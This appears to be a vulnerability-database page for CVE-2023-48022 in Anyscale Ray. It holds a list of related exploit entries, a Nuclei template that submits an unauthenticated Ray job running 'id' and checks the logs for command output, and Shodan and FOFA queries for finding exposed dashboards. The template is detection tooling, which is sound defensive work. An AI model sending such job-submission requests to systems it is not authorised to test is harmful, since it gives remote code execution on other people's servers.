| Reporter | Title | Published | Views | Family All 62 |
|---|---|---|---|---|
| Exploit for Server-Side Request Forgery in Anyscale Ray | 10 Jan 202406:26 | – | githubexploit | |
| Exploit for Server-Side Request Forgery in Anyscale Ray | 29 Mar 202409:54 | – | githubexploit | |
| Ray Agent Job Remote Code Execution Exploit | 27 Aug 202400:00 | – | zdt | |
| The vulnerability of the client framework for AI and Python Ray application scaling application programming interface allows a attacker to execute arbitrary commands. | 6 Apr 202400:00 | – | bdu_fstec | |
| CVE-2023-48022 vulnerabilities | 7 Jan 202601:30 | – | cgr | |
| CVE-2023-48022 | 17 Dec 202316:42 | – | circl | |
| Ray Code Issues Vulnerabilities | 28 Nov 202300:00 | – | cnnvd | |
| CVE-2023-48022 | 28 Nov 202300:00 | – | cve | |
| CVE-2023-48022 | 28 Nov 202300:00 | – | cvelist | |
| Ray Path Traversal vulnerability | 16 Nov 202318:30 | – | github |
id: CVE-2023-48022
info:
name: Anyscale Ray - Remote Code Execution
author: riteshs4hu
severity: critical
description: |
Anyscale Ray 2.6.3 and 2.8.0 contain a remote code execution vulnerability due to insecure job submission API, allowing attackers to execute arbitrary code remotely if they have network access to the Ray Dashboard API.
impact: |
Unauthenticated attackers with network access to the Ray Dashboard API can execute arbitrary code remotely as root, leading to complete system compromise.
remediation: |
Upgrade Anyscale Ray to version 2.6.4 or later, or version 2.8.1 or later, and restrict network access to the Ray Dashboard API.
reference:
- https://bishopfox.com/blog/ray-versions-2-6-3-2-8-0
- https://vulncheck.com/xdb/497d7fb3b118
- https://github.com/jakabakos/ShadowRay-RCE-PoC-CVE-2023-48022
- https://vulncheck.com/xdb/d3bafad9c9f6
- https://github.com/0x656565/CVE-2023-48022
- https://nvd.nist.gov/vuln/detail/cve-2023-48022
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2023-48022
cwe-id: CWE-78
epss-score: 0.81512
epss-percentile: 0.99594
metadata:
verified: true
max-request: 3
vendor: ray_project
product: ray
shodan-query:
- http.favicon.hash:463802404
- http.html:"ray dashboard"
fofa-query:
- icon_hash=463802404
- body="ray dashboard"
tags: cve,cve2023,rce,ray,anyscale,vkev,vuln
variables:
jobid: "Job_{{rand_base(6)}}"
http:
- raw:
- |
POST /api/jobs/ HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{
"entrypoint": "id",
"submission_id": "{{jobid}}"
}
- | # wait for 8 seconds before getting the logs
GET / HTTP/1.1
Host: {{Hostname}}
{{wait_for(8)}}
- |
GET /api/jobs/{{jobid}}/logs HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "logs\":")'
- 'contains(content_type, "application/json")'
- 'regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)", body)'
condition: and
# digest: 4a0a004730450220317884f1a6a3591e9df20808c0e0050dd1498a5db489a74ac958db1b9838b901022100dfda88a5c42a2635754c71f8135891ab1ebd099b72823863c9e88ee3214ccc9a:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation